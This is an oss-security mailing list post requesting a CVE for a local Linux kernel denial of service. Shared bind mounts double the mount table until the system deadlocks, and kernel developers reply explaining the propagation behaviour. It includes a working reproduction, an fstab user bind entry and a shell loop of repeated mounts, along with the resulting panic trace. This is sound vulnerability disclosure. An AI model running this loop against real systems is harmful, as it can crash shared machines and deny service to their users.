Date: Wed, 13 Jul 2016 10:52:44 -0400 (EDT) From: CAI Qian <caiqian@...hat.com> To: oss-security@...ts.openwall.com Cc: cve-assign@...re.org Subject: cve request: local DoS by overflowing kernel mount table using shared bind mount Below is the discussion between myself and staffs from security@...nel.org. CAI Qian === Initial Report === It was reported that the mount table expands by a power-of-two with each bind mount command. This is a change of behavior against the older kernel (i.e., 2.6.18). Hence, the older kernel won't be affected or harder to exploit. If the system is configured in the way that a non-root user allows bind mount even if with limit number of bind mount allowed, a non-root user could cause a local DoS by quickly overflow the mount table. For example, $ cat /etc/fstab ... /tmp/1 /tmp/2 none user,bind 0 0 Even if the application could say only allow 30 bind mounts to increase the security. $ for i in `seq 1 20`; do mount /tmp/1; done $ mount | wc -l 1048606 Once this happened, it will cause a deadlock for the whole system, [ 361.301885] NMI backtrace for cpu 0 [ 361.302352] CPU: 0 PID: 29 Comm: kworker/0:1 Not tainted 3.10.0-327.10.1.el7.x86_64 #1 [ 361.303062] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.8.1-20150318_183358- 04/01/2014 [ 361.303882] Workqueue: events qxl_fb_work [qxl] [ 361.304379] task: ffff88013943d080 ti: ffff8801395ec000 task.ti: ffff8801395ec000 [ 361.305057] RIP: 0010:[<ffffffff811e0b33>] [<ffffffff811e0b33>] prune_super+0x23/0x170 [ 361.305784] RSP: 0000:ffff8801395ef5c0 EFLAGS: 00000206 [ 361.306318] RAX: 0000000000000080 RBX: ffff8801394243b0 RCX: 0000000000000000 [ 361.306973] RDX: 0000000000000000 RSI: ffff8801395ef710 RDI: ffff8801394243b0 [ 361.307628] RBP: ffff8801395ef5e8 R08: 0000000000000000 R09: 0000000000000040 [ 361.308282] R10: 0000000000000000 R11: 0000000000000220 R12: ffff8801395ef710 [ 361.308939] R13: ffff880139424000 R14: ffff8801395ef710 R15: 0000000000000000 [ 361.309599] FS: 0000000000000000(0000) GS:ffff88013fc00000(0000) knlGS:0000000000000000 [ 361.310320] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 361.310893] CR2: 00007fea0c55dc3d CR3: 00000000b770d000 CR4: 00000000003406f0 [ 361.311561] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 361.312227] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 361.312894] Stack: [ 361.313223] 0000000000000400 ffff8801395ef710 ffff8801394243b0 0000000000000258 [ 361.313950] 0000000000000000 ffff8801395ef688 ffffffff8117c46b 0000000000000000 [ 361.314858] ffff8801395ef630 ffffffff811d5e21 ffff8801395ef720 0000000000000036 [ 361.315615] Call Trace: [ 361.315995] [<ffffffff8117c46b>] shrink_slab+0xab/0x300 [ 361.316559] [<ffffffff811d5e21>] ? vmpressure+0x21/0x90 [ 361.317114] [<ffffffff8117f6a2>] do_try_to_free_pages+0x3c2/0x4e0 [ 361.317727] [<ffffffff8117f8bc>] try_to_free_pages+0xfc/0x180 [ 361.318309] [<ffffffff811735bd>] __alloc_pages_nodemask+0x7fd/0xb90 [ 361.318927] [<ffffffff811b4429>] alloc_pages_current+0xa9/0x170 [ 361.319513] [<ffffffff811be9ec>] new_slab+0x2ec/0x300 [ 361.320045] [<ffffffff8163220f>] __slab_alloc+0x315/0x48f [ 361.320596] [<ffffffff811e064c>] ? get_empty_filp+0x5c/0x1a0 [ 361.321161] [<ffffffff811c0fb3>] kmem_cache_alloc+0x193/0x1d0 [ 361.321735] [<ffffffff811e064c>] ? get_empty_filp+0x5c/0x1a0 [ 361.322295] [<ffffffff811e064c>] get_empty_filp+0x5c/0x1a0 [ 361.322845] [<ffffffff811e07ae>] alloc_file+0x1e/0xf0 [ 361.323362] [<ffffffff81182773>] __shmem_file_setup+0x113/0x1f0 [ 361.323940] [<ffffffff81182860>] shmem_file_setup+0x10/0x20 [ 361.324496] [<ffffffffa039f5ab>] drm_gem_object_init+0x2b/0x40 [drm] [ 361.325103] [<ffffffffa0422c3d>] qxl_bo_create+0x7d/0x190 [qxl] [ 361.325680] [<ffffffffa042798c>] ? qxl_release_list_add+0x5c/0xc0 [qxl] [ 361.326299] [<ffffffffa0424066>] qxl_alloc_bo_reserved+0x46/0xb0 [qxl] [ 361.326912] [<ffffffffa0424fde>] qxl_image_alloc_objects+0xae/0x140 [qxl] [ 361.327544] [<ffffffffa042556e>] qxl_draw_opaque_fb+0xce/0x3c0 [qxl] [ 361.328145] [<ffffffffa0421ee2>] qxl_fb_dirty_flush+0x1a2/0x260 [qxl] [ 361.328754] [<ffffffffa0421fb9>] qxl_fb_work+0x19/0x20 [qxl] [ 361.329306] [<ffffffff8109d5db>] process_one_work+0x17b/0x470 [ 361.329865] [<ffffffff8109e3ab>] worker_thread+0x11b/0x400 [ 361.330393] [<ffffffff8109e290>] ? rescuer_thread+0x400/0x400 [ 361.330940] [<ffffffff810a5acf>] kthread+0xcf/0xe0 [ 361.331419] [<ffffffff810a5a00>] ? kthread_create_on_node+0x140/0x140 [ 361.332005] [<ffffffff81645998>] ret_from_fork+0x58/0x90 [ 361.332513] [<ffffffff810a5a00>] ? kthread_create_on_node+0x140/0x140 [ 361.333093] Code: 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 49 89 f6 41 55 4c 8d af 50 fc ff ff 41 54 53 4c 8b 46 08 48 89 fb <4d> 85 c0 74 09 f6 06 80 0f 84 2f 01 00 00 48 8b 83 80 fc ff ff [ 361.335906] Kernel panic - not syncing: hung_task: blocked tasks === From Al Viro === the number of vfsmounts getting propagation from /tmp is doubling on each step. You are asking to take a subtree at /tmp/2 and attach it to /tmp/1 *and* *all* *existing* peers. Turning all copies into peers of what was on /tmp/2. So after the first mount --bind you get two vfsmounts - /tmp and /tmp/1. And the damn things are peers - you mount anything on /tmp/1/shit, you get its clone attached to the matching directory (/2/shit) in /tmp. After the second mount --bind you've got two more vfsmounts - one overmounting /tmp/1 and another - /tmp/2. And again, all of them constitute one peer group. With 4 elements now. Etc. === From Eric W. Biederman === First let's be clear, it is systemd that calls MS_SHARED|MS_REC on /. Furthermore the configuration interface for mount propagation is error prone and pretty much requires the most problematic cases be the default makine the interfaces very easy to use incorrectly. Especially for code that was only tested on systems prior to systemd. All of this is currently allowed if a user namespace creates a mount namespace so the concern is real. Of course we also allow using as much memory as we want with virtual addresses as well. It is slightly worse on 32bit in that it is kernel memory we are consuming and not user memory. Still it is just another form of unlimited memory consumption that is causing the problem. We have cases where in typical deployments we allow users to consume all of the memory on the system. That said this definitely is a case where we could set a reasonable upper limits on the number mount objects and catch it when people do crazy things by accident before the system gets stuck in an OOM. I am in the process of cooking up a number up limits of that kind and I will see about adding a limit on the number of mounts as well.
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ